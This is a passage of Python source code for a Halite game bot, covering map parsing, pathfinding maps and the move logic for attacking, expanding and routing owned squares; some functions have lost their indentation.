        self.set_configs()
        send_string(botname)
    def __iter__(self):
        # Allows direct iteration over all squares
        return itertools.chain.from_iterable(self.squares)
    def get_frame(self, map_string=None):
        # Updates the map information from the latest frame provided by the game environment
        if map_string is None:
            map_string = get_string()
        split_string = map_string.split()
        # The state of the map (including owner and strength values, but excluding production values) is sent in the following way:
        # One integer, COUNTER, representing the number of tiles with the same owner consecutively.
        # One integer, OWNER, representing the owner of the tiles COUNTER encodes.
        # The above repeats until the COUNTER total is equal to the area of the map.
        # It fills in the map from row 1 to row HEIGHT and within a row from column 1 to column WIDTH.
        # Please be aware that the top row is the first row, as Halite uses screen-type coordinates.
        owners = list()
        while len(owners) < self.w * self.h:
            counter = int(split_string.pop(0))
            owner = int(split_string.pop(0))
            owners.extend([owner] * counter)
        assert len(owners) == self.w * self.h
        self.owner_map = np.array(owners).reshape((self.h, self.w)).transpose()
        # This is then followed by WIDTH * HEIGHT integers, representing the strength values of the tiles in the map.
        # It fills in the map in the same way owner values fill in the map.
        assert len(split_string) == self.w * self.h
        str_list = list(map(int, split_string))
        self.strength_map = np.array(str_list).reshape((self.h, self.w)).transpose()
        # Update all squares
        for x in range(self.w):
            for y in range(self.h):
                self.squares[x, y].update(self.owner_map[x, y], self.strength_map[x, y])
        # Reset the move_map (-1 == unassigned)
        self.move_map = np.ones((self.w, self.h)) * -1 # Could possibly expand this in the future to consider enemy moves...
        self.moving_into_map = np.zeros((self.w, self.h))
        self.frame += 1
    def send_frame(self):
        # Goes through each square and get the list of moves.
        move_list = []
        for sq in itertools.chain.from_iterable(self.squares):
            if sq.owner == self.my_id:
                if sq.strength == 0: # Squares with 0 strength shouldn't move.
                    sq.move = 4
                if sq.move == -1:
                    # In the event we didn't actually assign a move, make sure it's coded to STILL
                    sq.move = 4
                move_list.append(sq)
        send_string(' '.join(str(square.x) + ' ' + str(square.y) + ' ' + str(translate_cardinal(square.move)) for square in move_list))
def create_squares_list(self):
self.squares = np.empty((self.w, self.h), dtype=np.object)
for x in range(self.w):
for y in range(self.h):
self.squares[x, y] = Square(self, x, y, self.production_map[x, y])
for x in range(self.w):
for y in range(self.h):
self.squares[x, y].after_init_update()
    def set_configs(self):
        # Initial tuning knobs; update_configs() revises these every frame.
        self.str_cap = 255
        self.buildup_multiplier = np.minimum(np.maximum(self.production_map, 4), 9)
        self.pre_combat_threshold = -3
        self.combat_radius = 5
        self.production_cells_out = 12
        self.phase = 0
    def update_configs(self):
        # Per-frame heuristic tuning of build-up and combat parameters.
        self.buildup_multiplier = np.minimum(np.maximum(self.production_map, 5), 5)
        # self.buildup_multiplier = np.minimum(np.maximum(self.production_map, 4), 7)
        self.buildup_multiplier = self.buildup_multiplier - (self.distance_from_border ** 0.4)
        # self.combat_radius = int(min(max(5, self.percent_owned * self.w / 2), self.w // 2))
        self.combat_radius = 7
        if self.percent_owned > 0.6:
            # Late game: we dominate, push harder and fight wider.
            self.buildup_multiplier -= 1
            self.pre_combat_threshold = 0
            self.combat_radius = 10
        elif self.my_production_sum / self.next_highest_production_sum > 1.1:
            # Production lead over the next best player: afford to bank strength.
            self.buildup_multiplier += 1
        # parity: which checkerboard color currently holds more of our strength
        if np.sum(self.even * self.is_owned_map * self.strength_map) > np.sum(self.odd * self.is_owned_map * self.strength_map):
            self.parity = 0
        else:
            self.parity = 1
        if self.percent_owned > 0.10:
            self.buildup_multiplier += 4
        # Cap so a square never waits past ~230 strength before moving.
        self.buildup_multiplier = np.minimum(self.buildup_multiplier, 230 / self.production_map_1)
    def create_one_time_maps(self):
        # Precompute maps that never change during the game.
        self.distance_map_no_decay = self.create_distance_map(1)
        # clamped copies used to avoid divide-by-zero in ratios
        self.production_map_01 = np.maximum(self.production_map, 0.1)
        self.production_map_1 = np.maximum(self.production_map, 1)
        self.strength_map_01 = np.maximum(self.strength_map, 0.1)
        self.strength_map_1 = np.maximum(self.strength_map, 1)
        self.create_dijkstra_maps()
        self.create_parity_maps()
@timethis
def create_distance_map(self, falloff=1):
# Creates a distance map so that we can easily divide a map to get ratios that we are interested in
# self.distance_map[x, y, :, :] returns an array of (width, height) that gives the distance (x, y) is from (i, j) for all i, j
# Note that the actual distance from x, y, to i, j is set to 1 to avoid divide by zero errors. Anything that utilizes this function should be aware of this fact.
# Create the base map for 0, 0
zero_zero_map = np.zeros((self.w, self.h), dtype=int)
for x in range(self.w):
for y in range(self.h):
dist_x = min(x, -x % self.w)
dist_y = min(y, -y % self.w)
zero_zero_map[x, y] = max(dist_x + dist_y, 1)
if falloff != 1:
zero_zero_map = zero_zero_map ** falloff
distance_map = np.zeros((self.w, self.h, self.w, self.h), dtype=int)
for x in range(self.w):
for y in range(self.h):
distance_map[x, y, :, :] = roll_xy(zero_zero_map, x, y)
return distance_map
    @timethis
    def create_dijkstra_maps(self):
        # All-pairs shortest "recovery cost" paths, where stepping into a cell
        # costs strength / production of that cell. Cells are flattened to
        # index x * h + y for the sparse graph.
        h, w = self.h, self.w
        cost_recov_map = self.strength_map_1 / self.production_map_01
        def get_cost_recov(cellnum):
            # cost of the destination cell identified by its flat index
            x = cellnum // h
            y = cellnum % h
            return cost_recov_map[x, y]
        dij_recov_costs = scipy.sparse.dok_matrix((w * h, w * h))
        for x in range(w):
            for y in range(h):
                coord = x * h + y
                # edges to the four toroidal neighbors, weighted by the
                # neighbor's recovery cost
                dij_recov_costs[coord, ((x + 1) % w) * h + ((y + 0) % h)] = get_cost_recov(((x + 1) % w) * h + ((y + 0) % h))
                dij_recov_costs[coord, ((x - 1) % w) * h + ((y + 0) % h)] = get_cost_recov(((x - 1) % w) * h + ((y + 0) % h))
                dij_recov_costs[coord, ((x + 0) % w) * h + ((y + 1) % h)] = get_cost_recov(((x + 0) % w) * h + ((y + 1) % h))
                dij_recov_costs[coord, ((x + 0) % w) * h + ((y - 1) % h)] = get_cost_recov(((x + 0) % w) * h + ((y - 1) % h))
        self.dij_recov_cost, self.dij_recov_route = scipy.sparse.csgraph.dijkstra(dij_recov_costs, return_predecessors=True)
        # Reshape flat results into [src_x, src_y, dst_x, dst_y] lookups.
        self.dij_recov_distance_map = np.zeros((w, h, w, h))
        self.dij_recov_route_map = np.zeros((w, h, w, h), dtype=int)
        for x in range(self.w):
            for y in range(self.h):
                self.dij_recov_distance_map[x, y, :, :] = self.dij_recov_cost[x * h + y].reshape((w, h))
                self.dij_recov_route_map[x, y, :, :] = self.dij_recov_route[x * h + y].reshape((w, h))
def create_parity_maps(self):
self.even = np.zeros((self.w, self.h))
for x in range(self.w):
for y in range(self.h):
self.even[x, y] = 0 if (x + y) % 2 else 1
self.odd = 1 - self.even
    def update(self):
        # Per-frame refresh: derived maps first, then stats, then tuning.
        self.update_maps()
        self.update_stats()
        self.update_configs()
    @timethis
    def update_maps(self):
        print_map(self.strength_map, "strength_map")
        print_map(self.production_map, "production_map")
        self.update_calc_maps()
        self.update_owner_maps()
        self.update_border_maps()
        self.update_enemy_maps()
        self.update_controlled_influence_production_maps()
        self.update_value_production_map()
    def update_calc_maps(self):
        # refresh the divide-by-zero-safe strength copies
        self.strength_map_01 = np.maximum(self.strength_map, 0.1)
        self.strength_map_1 = np.maximum(self.strength_map, 1)
    def update_owner_maps(self):
        # 0/1 masks partitioning the board into mine / neutral / enemy.
        self.is_owned_map = np.zeros((self.w, self.h), dtype=int)
        self.is_neutral_map = np.zeros((self.w, self.h), dtype=int)
        self.is_enemy_map = np.zeros((self.w, self.h), dtype=int)
        self.is_owned_map[np.where(self.owner_map == self.my_id)] = 1
        self.is_neutral_map[np.where(self.owner_map == 0)] = 1
        self.is_enemy_map = 1 - self.is_owned_map - self.is_neutral_map
    @timethis
    def update_border_maps(self):
        # border_map: non-owned cells adjacent to owned territory.
        self.border_map = np.zeros((self.w, self.h), dtype=int)
        self.combat_zone_map = np.zeros((self.w, self.h), dtype=int)
        self.border_map += self.is_owned_map
        self.border_map += roll_xy(self.is_owned_map, 0, 1)
        self.border_map += roll_xy(self.is_owned_map, 0, -1)
        self.border_map += roll_xy(self.is_owned_map, 1, 0)
        self.border_map += roll_xy(self.is_owned_map, -1, 0)
        self.border_map = np.minimum(self.border_map, 1)
        self.border_map -= self.is_owned_map
        border_squares_indices = np.transpose(np.nonzero(self.border_map))
        border_squares = [self.squares[c[0], c[1]] for c in border_squares_indices]
        self.distance_from_border = self.flood_fill(border_squares, max(self.w, self.h), True)
        # combat zone: border cells with 0 strength (contested in Halite)
        self.combat_zone_map = self.border_map * (self.strength_map == 0)
        if self.starting_player_count > 1 and np.sum(self.combat_zone_map) >= 1: # Breaks in single player mode otherwise.
            combat_squares_indices = np.transpose(np.nonzero(self.combat_zone_map))
            combat_squares = [self.squares[c[0], c[1]] for c in combat_squares_indices]
            self.distance_from_combat_zone = self.flood_fill(combat_squares, max(self.w, self.h), True)
            self.distance_from_combat_zone[self.distance_from_combat_zone == -1] = 9999
            print_map(self.distance_from_combat_zone, "distance_from_combat_zone")
        else:
            self.distance_from_combat_zone = np.ones((self.w, self.h)) * 999
    @timethis
    def update_enemy_maps(self):
        # Layer d of enemy_strength_map is enemy strength spread d cells out.
        self.enemy_strength_map = np.zeros((5, self.w, self.h))
        self.enemy_strength_map[0] = self.strength_map * self.is_enemy_map
        # tiny epsilon marks enemy presence even at 0 strength
        self.enemy_strength_map[0] += self.is_enemy_map * 0.001
        for x in range(len(self.enemy_strength_map)):
            self.enemy_strength_map[x] = spread_n(self.enemy_strength_map[0], x)
            print_map(self.enemy_strength_map[x], "enemy_str_" + str(x) + "_")
        self.own_strength_map = np.zeros((8, self.w, self.h))
        self.own_strength_map[0] = self.strength_map * self.is_owned_map
        for x in range(len(self.own_strength_map)):
            self.own_strength_map[x] = spread_n(self.own_strength_map[0], x)
    @timethis
    def update_controlled_influence_production_maps(self):
        max_distance = 6
        self.controlled_production_influence_map = np.zeros((max_distance + 1, self.w, self.h))
        self.controlled_production_influence_map[0] = self.production_map * (self.is_enemy_map + self.is_owned_map)
        for distance in range(1, max_distance + 1):
            self.controlled_production_influence_map[distance] = spread_n(self.controlled_production_influence_map[distance - 1], 1)
            # NOTE(review): this immediately overwrites the spread_n result
            # above with rebase_map of layer distance-1 -- looks suspicious;
            # confirm whether rebase_map was meant to take the spread result.
            self.controlled_production_influence_map[distance] = rebase_map(self.controlled_production_influence_map[distance - 1], False)
@timethis
def update_value_production_map(self):
self.base_value_map = np.divide(self.production_map_01, self.strength_map_1) * (self.is_neutral_map - self.combat_zone_map)
# Each neutral cell gets assigned to the closest border non-combat cell
global_targets_indices = np.transpose(np.nonzero(self.is_neutral_map - self.combat_zone_map))
global_targets = [self.squares[c[0], c[1]] for c in global_targets_indices]
self.global_border_map = np.zeros((self.w, self.h))
gb_map = self.dij_recov_distance_map * (self.border_map - self.combat_zone_map)
gb_map[gb_map == 0] = 9999
for g in global_targets:
if self.base_value_map[g.x, g.y] > 0.02:
# Find the closest border square that routes to g
gb_map = self.dij_recov_distance_map[g.x, g.y] * (self.border_map - self.combat_zone_map)
gb_map[gb_map == 0] = 9999
tx, ty = np.unravel_index(gb_map.argmin(), (self.w, self.h))
self.global_border_map[tx, ty] += self.base_value_map[g.x, g.y] / self.dij_recov_distance_map[g.x, g.y, tx, ty]
self.value_production_map = 1 / np.maximum(self.base_value_map + self.global_border_map * 0.25, 0.001)
self.value_production_map *= (self.border_map - self.combat_zone_map) * (self.enemy_strength_map[1] == 0)
self.value_production_map[self.value_production_map == 0] = 9999
turns_left = self.max_turns - self.frame
recover_threshold = turns_left * 0.6
self.value_production_map[self.value_production_map > recover_threshold] == 9999
avg_recov_threshold = 2
# avg_map_recovery = np.sum(self.strength_map * (self.border_map - self.combat_zone_map)) / np.sum(self.production_map * (self.border_map - self.combat_zone_map))
avg_map_recovery = np.sum(self.strength_map * self.border_map) / np.sum(self.production_map * self.border_map)
self.value_production_map[self.value_production_map > (avg_recov_threshold * avg_map_recovery)] = 9999
    def update_stats(self):
        # Updates various stats used for tracking
        self.turns_left = self.max_turns - self.frame
        self.percent_owned = np.sum(self.is_owned_map) / (self.w * self.h)
        # production_values[i] = total production owned by player i (index 0 unused)
        self.production_values = [0]
        for i in range(1, self.starting_player_count + 1):
            self.production_values.append(np.sum(self.production_map * (self.owner_map == i)))
        self.my_production_sum = self.production_values[self.my_id]
        temp_production_sum = copy.copy(self.production_values)
        temp_production_sum.pop(self.my_id)
        temp_production_sum.pop(0)
        self.next_highest_production_sum = max(temp_production_sum)
        # near_enemy: any enemy strength within 4 cells of our territory
        if np.sum(self.is_owned_map * self.enemy_strength_map[4]) > 0:
            self.near_enemy = True
        else:
            self.near_enemy = False
        # Detect who we are currently in combat with
        self.in_combat_with = []
        combat_zone_squares = [self.squares[c[0], c[1]] for c in np.transpose(np.nonzero(self.combat_zone_map))]
        for sq in combat_zone_squares:
            if self.own_strength_map[1, sq.x, sq.y] > 0:
                for n in sq.neighbors:
                    if n.owner != 0 and n.owner != self.my_id:
                        self.in_combat_with.append(n.owner)
        self.in_combat_with = list(set(self.in_combat_with))
    @timethis
    def get_moves(self):
        # This is the main logic controlling code. Each stage bails out if
        # the per-turn time budget (MAX_TURN_TIME) has been spent.
        # Find super high production cells
        # self.get_pre_combat_production()
        # 1 - Find combat zone cells and attack them.
        if (timer() - game.start) > MAX_TURN_TIME:
            return
        self.get_moves_attack()
        # self.get_moves_prepare_strength()
        # 2 - Find production zone cells and attack them
        if (timer() - game.start) > MAX_TURN_TIME:
            return
        self.get_moves_production()
        # 3 - Move all other unassigned cells.
        if (timer() - game.start) > MAX_TURN_TIME:
            return
        self.get_moves_other()
    def get_pre_combat_production(self):
        # In the event we are trying to fight in a very high production zone, reroute some attacking power to expand in this area.
        # (1 / base_value_map is the recovery time of a border cell.)
        potential_targets_indices = np.transpose(np.nonzero(self.border_map - self.combat_zone_map))
        potential_targets = [self.squares[c[0], c[1]] for c in potential_targets_indices if (1 / self.base_value_map[c[0], c[1]] < self.pre_combat_threshold)]
        if len(potential_targets) == 0:
            return
        potential_targets.sort(key=lambda sq: 1 / self.base_value_map[sq.x, sq.y])
        best_target_value = 1 / self.base_value_map[potential_targets[0].x, potential_targets[0].y]
        # anything with X of the best_value target should be considered. Let's set this to 4 right now.
        while len(potential_targets) > 0 and 1 / self.base_value_map[potential_targets[0].x, potential_targets[0].y] <= (best_target_value + 1):
            target = potential_targets.pop(0)
            self.attack_cell(target, 2)
@timethis
def get_moves_attack(self):
    """Assign combat moves: seize combat-zone border cells, then marshal
    nearby friendly squares toward (or hold them near) the fighting."""
    # Attempts to attack all border cells that are in combat.
    combat_zone_squares = [self.squares[c[0], c[1]] for c in np.transpose(np.nonzero(self.combat_zone_map))]
    # Stable sorts: the later sort on enemy_strength_map[1] is the primary
    # key, with enemy_strength_map[2] breaking ties.
    combat_zone_squares.sort(key=lambda x: self.enemy_strength_map[2, x.x, x.y], reverse=True)
    combat_zone_squares.sort(key=lambda x: self.enemy_strength_map[1, x.x, x.y], reverse=True)
    # TODO: Should sort by amount of overkill damage possible.
    for square in combat_zone_squares:
        self.attack_cell(square, 1)
    self.get_moves_breakthrough()
    # All squares within combat_radius of a combat zone square.
    # TODO: This causes bounciness, i should probably do a floodfill of all combat zone squares instead?
    combat_distance_matrix = self.flood_fill(combat_zone_squares, self.combat_radius, True)
    combat_squares = [self.squares[c[0], c[1]] for c in np.transpose(np.nonzero(combat_distance_matrix))]
    combat_squares = [s for s in combat_squares if s.owner == self.my_id]
    # Same stable-sort layering; primary key is enemy_strength_map[1].
    combat_squares.sort(key=lambda x: x.strength, reverse=True)
    combat_squares.sort(key=lambda x: self.enemy_strength_map[2, x.x, x.y], reverse=True)
    combat_squares.sort(key=lambda x: self.enemy_strength_map[1, x.x, x.y], reverse=True)
    print_map(combat_distance_matrix, "combat_distance_matrix_")
    for square in combat_squares:
        if (square.strength > 0) and (combat_distance_matrix[square.x, square.y] == 1) and (square.move == -1 or square.move == STILL):
            # Directly adjacent to the combat zone: step into an empty
            # neutral square, preferring higher nearby enemy strength.
            targets = []
            alt_targets = []
            for n in square.neighbors:
                if n.owner == 0 and n.strength == 0:
                    targets.append(n)
                elif n.owner == self.my_id:
                    alt_targets.append(n)
            # NOTE(review): alt_targets is collected and sorted but never used.
            targets.sort(key=lambda x: self.enemy_strength_map[2, x.x, x.y], reverse=True)
            alt_targets.sort(key=lambda x: x.strength)
            success = False
            # First try without routing through friendly squares, then allow it.
            for t in targets:
                success = self.move_square_to_target_simple(square, t, False)
                if success:
                    break
            if not success:
                for t in targets:
                    success = self.move_square_to_target_simple(square, t, True)
                    if success:
                        break
        elif ((square.strength > (square.production * (self.buildup_multiplier[square.x, square.y] + 2))) or square.strength > 250) and (square.parity == self.parity) and square.move == -1 and square.moving_here == []:
            # Built up past threshold (or near the 255 cap) and on the right
            # parity: advance down the distance gradient toward the zone.
            self.move_towards_map_old(square, combat_distance_matrix)
        else:
            # Not ready to advance; hold position unless right next to the zone.
            if combat_distance_matrix[square.x, square.y] > 1:
                self.make_move(square, STILL, None)
@timethis
def get_moves_prepare_strength(self):
    """Build up strength near enemy-adjacent borders prior to an immediate
    engagement, only if we aren't already in combat there."""
    # Border squares that already feel nonzero adjacent enemy strength.
    border_prepare_indices = np.transpose(np.nonzero(self.border_map * self.enemy_strength_map[1] > 0))
    enemy_border_squares = [self.squares[c[0], c[1]] for c in border_prepare_indices]
    if len(enemy_border_squares) > 0:
        # Distances (up to 5) from those border squares through our territory.
        combat_distance_matrix = self.flood_fill(enemy_border_squares, 5, True)
        combat_distance_matrix[combat_distance_matrix == -1] = 0
        combat_squares = [self.squares[c[0], c[1]] for c in np.transpose(np.nonzero(combat_distance_matrix))]
        for square in combat_squares:
            if (self.distance_from_combat_zone[square.x, square.y] > 3) and (square.strength > square.production * self.buildup_multiplier[square.x, square.y] + 5) and (square.parity == self.parity) and square.move == -1 and square.moving_here == []:
                # Far from actual combat but strong enough: advance toward the border.
                self.move_towards_map_old(square, combat_distance_matrix)
            elif (square.strength >= 240) and (self.own_strength_map[2, square.x, square.y] >= 750) and (combat_distance_matrix[square.x, square.y] == 1):
                # Near-capped square backed by lots of friendly strength,
                # sitting right at the border: attack the side with the
                # strongest adjacent enemy presence.
                targets = []
                for n in square.neighbors:
                    if combat_distance_matrix[n.x, n.y] == 0:
                        targets.append(n)
                targets.sort(key=lambda n: self.enemy_strength_map[1, n.x, n.y], reverse=True)
                self.move_square_to_target_simple(square, targets[0], False)
            elif square.move == -1:
                # Otherwise hold still and accumulate production.
                self.make_move(square, STILL, None)
@timethis
def get_moves_production(self):
    """Find the best cells to attack from a production standpoint and
    coordinate attacks on them; combat-zone cells are handled elsewhere."""
    # Candidates are cells with a finite value_production_map entry
    # (values >= 8000 act as an "excluded" sentinel).
    potential_targets_indices = np.transpose(np.nonzero((self.value_production_map < 8000)))
    potential_targets_one = [self.squares[c[0], c[1]] for c in potential_targets_indices]
    potential_targets_one.sort(key=lambda x: self.value_production_map[x.x, x.y])
    # Keep only the best 85% of candidates.
    percentile = 0.85
    cutoff = int(len(potential_targets_one) * percentile)
    potential_targets_one = potential_targets_one[:cutoff]
    # Expand each candidate into (target, value, cells_out) tuples, one per
    # capture radius up to production_cells_out.
    potential_targets = []
    for c in potential_targets_one:
        target = self.squares[c.x, c.y]
        value = self.value_production_map[c.x, c.y]
        cells_out = 1
        while cells_out <= self.production_cells_out:
            potential_targets.append((target, value, cells_out))
            cells_out += 1
    if len(potential_targets) == 0:
        return
    # Stable sorts: primary key is value plus a radius penalty; ties break
    # toward weaker targets.
    potential_targets.sort(key=lambda x: x[0].strength)
    potential_targets.sort(key=lambda x: x[1] + (x[2] * 1))
    # Keep only the top x%ile? Currently disabled (percentile = 1).
    percentile = 1
    cutoff = int(len(potential_targets) * percentile)
    potential_targets = potential_targets[:cutoff]
    # NOTE(review): remove_targets is sliced from the already-trimmed list,
    # so it is always empty and the 9999 marking below never runs.
    remove_targets = potential_targets[cutoff:]
    for t in remove_targets:
        self.value_production_map[t[0].x, t[0].y] = 9999
    while len(potential_targets) > 0:
        if (timer() - game.start) > MAX_TURN_TIME:
            return
        target = potential_targets.pop(0)
        # min and max radius are both this entry's cells_out.
        success = self.attack_cell(target[0], target[2], target[2])
        if success and target[2] < self.production_cells_out:
            # Attack scheduled: drop this target's remaining radius entries.
            potential_targets = list(filter(lambda sq: sq[0] != target[0], potential_targets))
@timethis
def get_moves_breakthrough(self):
    """Try to bust through and open additional lanes of attack into enemy
    territory when we have a large local strength advantage."""
    # Best to have a separate lane, so only squares that are next to the
    # enemy already (but outside the combat zone) are considered.
    if len(self.in_combat_with) == 0:
        enemy_targets = [1, 2, 3, 4, 5, 6]
        enemy_targets.remove(self.my_id)
        # NOTE(review): this unconditionally overwrites the list just built,
        # disabling breakthrough when not already in combat. Possibly
        # deliberate tuning -- confirm before "fixing".
        enemy_targets = []
    else:
        enemy_targets = self.in_combat_with
    # Non-combat border squares that feel nonzero adjacent enemy strength.
    potential_squares_indices = np.transpose(np.nonzero((self.border_map - self.combat_zone_map) * (self.enemy_strength_map[1] > 0)))
    potential_squares = [self.squares[c[0], c[1]] for c in potential_squares_indices]
    # We only want to bust through if we have a lot of strength here.
    for sq in potential_squares:
        attack = False
        for n in sq.neighbors:
            if n.owner in enemy_targets:
                attack = True
                break
        if attack:
            # Require a large absolute and relative local strength advantage.
            if self.own_strength_map[4, sq.x, sq.y] > 500 and (self.own_strength_map[4, sq.x, sq.y] > 1.5 * self.enemy_strength_map[4, sq.x, sq.y]):
                self.attack_cell(sq, 1)
@timethis
def get_moves_other(self):
    """Route every still-unassigned owned square toward the nearest
    non-owned border or the nearest combat zone."""
    idle_indices = np.transpose(np.nonzero((self.move_map == -1) * self.is_owned_map))
    idle_squares = [self.squares[ix, iy] for ix, iy in idle_indices]
    if not idle_squares:
        return
    # Layered stable sorts: squares closest to combat go first, then those
    # closest to the border, strongest first within each group.
    idle_squares.sort(key=lambda s: s.strength, reverse=True)
    idle_squares.sort(key=lambda s: self.distance_from_border[s.x, s.y])
    idle_squares.sort(key=lambda s: self.distance_from_combat_zone[s.x, s.y])
    no_combat_anywhere = np.sum(self.combat_zone_map) == 0
    for sq in idle_squares:
        if (timer() - game.start) > MAX_TURN_TIME:
            return
        ready = sq.strength > sq.production * self.buildup_multiplier[sq.x, sq.y]
        if not (ready and sq.move == -1 and sq.moving_here == []):
            continue
        if no_combat_anywhere:
            self.find_nearest_non_owned_border(sq)
            continue
        off_parity = sq.parity != game.parity
        if off_parity and self.distance_from_combat_zone[sq.x, sq.y] < 6:
            # Wrong parity near combat: wait a turn rather than arrive off-beat.
            continue
        if off_parity and self.enemy_strength_map[3, sq.x, sq.y] > 0:
            self.make_move(sq, STILL, None)
        else:
            self.find_nearest_combat_zone(sq)
def distance_between(self, sq1, sq2):
    """Toroidal (wrap-around) Manhattan distance between two squares."""
    dx = abs(sq1.x - sq2.x)
    dy = abs(sq1.y - sq2.y)
    # Take the shorter way around each axis of the wrapped map.
    dx = min(dx, self.w - dx)
    dy = min(dy, self.h - dy)
    return dx + dy
def attack_cell(self, target, max_cells_out, min_cells_out=1):
    """Attempt to coordinate an attack on a specific cell.

    Starting at min_cells_out, the capture radius grows until the strength
    of participating squares plus the production accrued by the waiting
    inner squares exceeds the target's strength. Returns True if an attack
    was scheduled, False otherwise.
    """
    cells_out = min_cells_out
    while cells_out <= max_cells_out:
        # If we're trying to attack a combat zone cell, this isn't the function to do it. cancel.
        if cells_out > 1 and self.combat_zone_map[target.x, target.y]:
            return False
        # Decide which of our squares may take part.
        if np.sum(self.is_owned_map) <= 5 and self.near_enemy is False:
            # Tiny early-game empire with no enemy nearby: any unassigned square.
            free_squares = self.is_owned_map * (self.move_map == -1)
        else:
            if target.strength == 0 or self.value_production_map[target.x, target.y] <= 2:  # or target.production >= 5: # or self.phase == 0:
                # Cheap or free target: any unassigned square may help.
                free_squares = self.is_owned_map * (self.move_map == -1)
            else:
                # Otherwise only squares past their buildup threshold that
                # nothing is already moving into.
                free_squares = self.is_owned_map * (self.move_map == -1) * (self.strength_map >= self.buildup_multiplier * self.production_map) * (self.moving_into_map == 0)
        # Distances from the target through friendly territory, masked to
        # the participating squares (-1 = unreachable -> 0).
        target_distance_matrix = self.flood_fill([target], cells_out, True)
        target_distance_matrix[target_distance_matrix == -1] = 0
        target_distance_matrix = target_distance_matrix * free_squares
        available_strength = np.sum(self.strength_map * np.minimum(target_distance_matrix, 1))
        # Squares closer than the rim wait (cells_out - d) turns and accrue
        # production meanwhile; rim squares (d == cells_out) move on turn
        # one, so they contribute no production.
        target_distance_matrix_production = cells_out - target_distance_matrix
        target_distance_matrix_production[target_distance_matrix_production == cells_out] = 0  # Cells furthest out would be moving so no production
        target_distance_matrix_production = target_distance_matrix_production * free_squares
        available_production = np.sum(self.production_map * target_distance_matrix_production)
        if available_strength + available_production > target.strength + 0:
            attacking_cells = [self.squares[c[0], c[1]] for c in np.transpose(np.nonzero(target_distance_matrix > 0))]
            still_cells = []
            if cells_out > 1:
                still_cells = [self.squares[c[0], c[1]] for c in np.transpose(np.nonzero(target_distance_matrix_production > 0))]
            moving_cells = list(set(attacking_cells) - set(still_cells))
            # Inner squares hold still and bank production.
            for square in still_cells:
                self.make_move(square, STILL, None)
            still_strength = np.sum(self.strength_map * np.minimum(target_distance_matrix_production, 1))
            needed_strength_from_movers = target.strength - available_production - still_strength + 1
            if needed_strength_from_movers > 0:
                # Handle movement here. Strongest movers first, to minimize
                # the number of cells that need to be moved.
                moving_cells.sort(key=lambda x: x.production)
                moving_cells.sort(key=lambda x: x.strength, reverse=True)
                for square in moving_cells:
                    if square.strength > 0:
                        if cells_out == 1:
                            self.move_square_to_target(square, target, False)
                        else:
                            self.move_square_to_target(square, target, True)
                        needed_strength_from_movers -= square.strength
                        if needed_strength_from_movers < 0:
                            break
            return True
        else:
            cells_out += 1
    return False
def make_move(self, square, direction, far_target):
    """Assign `direction` to `square`, keeping move_map, moving_into_map and
    the target square's `moving_here` list consistent.

    direction == -1 resets the square to "unassigned"; STILL keeps it in
    place; any cardinal direction points `square.target` at the chosen
    neighbor. `far_target` records the eventual multi-turn destination.
    """
    self.move_map[square.x, square.y] = direction
    if direction == -1:
        # Reset: undo the bookkeeping of any previously assigned move.
        # (The original set square.far_target = None twice here; the
        # duplicate assignment has been removed.)
        if square.target is not None:
            square.target.moving_here.remove(square)
            self.moving_into_map[square.target.x, square.target.y] -= 1
            square.target = None
        square.move = -1
        square.far_target = None
        return
    if square.move != -1:
        # Re-assignment: detach from the previously chosen target first.
        if square.target is not None:
            square.target.moving_here.remove(square)
            self.moving_into_map[square.target.x, square.target.y] -= 1
            square.target = None
            square.far_target = None
    square.move = direction
    if direction != STILL:
        square.target = square.neighbors[direction]
        square.target.moving_here.append(square)
        self.moving_into_map[square.target.x, square.target.y] += 1
    square.far_target = far_target
def move_square_to_target(self, source, destination, through_friendly):
    """Step `source` one square along a BFS shortest path to `destination`.

    Falls back to nudging an idle friendly blocker out of the way when the
    direct step would exceed the strength cap. Returns True if a move was
    queued, False otherwise.
    """
    # Get the distance matrix that we will use to determine movement.
    distance_matrix = self.flood_fill_until_target(source, destination, through_friendly)
    source_distance = distance_matrix[source.x, source.y]
    if source_distance == -1 or source_distance == 0:
        # We couldn't find a path to the destination or we're trying to move STILL.
        return False
    path_choices = []
    for d in range(0, 4):
        neighbor = source.neighbors[d]
        if distance_matrix[neighbor.x, neighbor.y] == (source_distance - 1):
            path_choices.append((d, neighbor))
    # There should be at most 2 cells in path_choices.
    path_choices.sort(key=lambda x: x[1].production)
    # Try simple resolution: step onto a square whose projected strength
    # stays under the cap.
    for (direction, target) in path_choices:
        future_strength = 0
        if target.owner == self.my_id:
            if target.move == -1 or target.move == STILL:
                future_strength = target.strength  # + target.production
                for sq in target.moving_here:
                    future_strength += sq.strength
        if future_strength + source.strength <= self.str_cap:
            self.make_move(source, direction, destination)
            return True
    for (direction, target) in path_choices:
        # Ok, can we move the cell that we are moving to?
        if target.owner == self.my_id:
            # Yes, but is the cell staying still? If not, then we can't do anything.
            if target.move == STILL or target.move == -1:
                # Make sure that moving this piece actually does something.
                future_strength = source.strength
                for sq in target.moving_here:
                    future_strength += sq.strength
                if future_strength <= self.str_cap:
                    # Queue our move up; undo below if the blocker can't be moved.
                    self.make_move(source, direction, destination)
                    n_directions = list(range(4))
                    # NOTE(review): n_neighbors is built and sorted but the
                    # loop below iterates n_directions, so the sort has no
                    # effect on the order actually tried.
                    n_neighbors = [(nd, target.neighbors[nd]) for nd in n_directions]
                    n_neighbors.sort(key=lambda x: x[1].production)
                    n_neighbors.sort(key=lambda x: self.distance_from_border[x[1].x, x[1].y], reverse=True)
                    # Try moving the blocker to one of its own neighbors.
                    for n_d in n_directions:
                        n = target.neighbors[n_d]
                        if n.owner == self.my_id and self.enemy_strength_map[2, n.x, n.y] == 0:
                            # Can we move into this square safely?
                            future_n_t_strength = target.strength
                            if n.move == STILL or n.move == -1:
                                future_n_t_strength += n.strength  # + n.production
                                for n_moving in n.moving_here:
                                    future_n_t_strength += n_moving.strength
                            if future_n_t_strength <= self.str_cap:
                                success = self.move_square_to_target_simple(target, n, True)
                                if success:
                                    return True
                    # TODO: Logic to attempt to capture a neutral cell if we want.
                    self.make_move(source, -1, None)
    # Nothing to do left.
    return False
def move_square_to_target_simple(self, source, destination, through_friendly):
    """Move `source` one step toward `destination` using simple wrap-aware
    per-axis distances (no pathfinding) -- good enough for long hauls.

    For each axis the shorter wrap direction is preferred; when that step
    is blocked (non-friendly while `through_friendly` is set) the opposite
    direction may be used as a "swap" fallback. Of the up-to-two candidate
    steps, non-swap moves and lower-production squares are tried first,
    falling back to recursively nudging an idle friendly blocker out of
    the way. Returns True if a move was queued, False otherwise.
    """
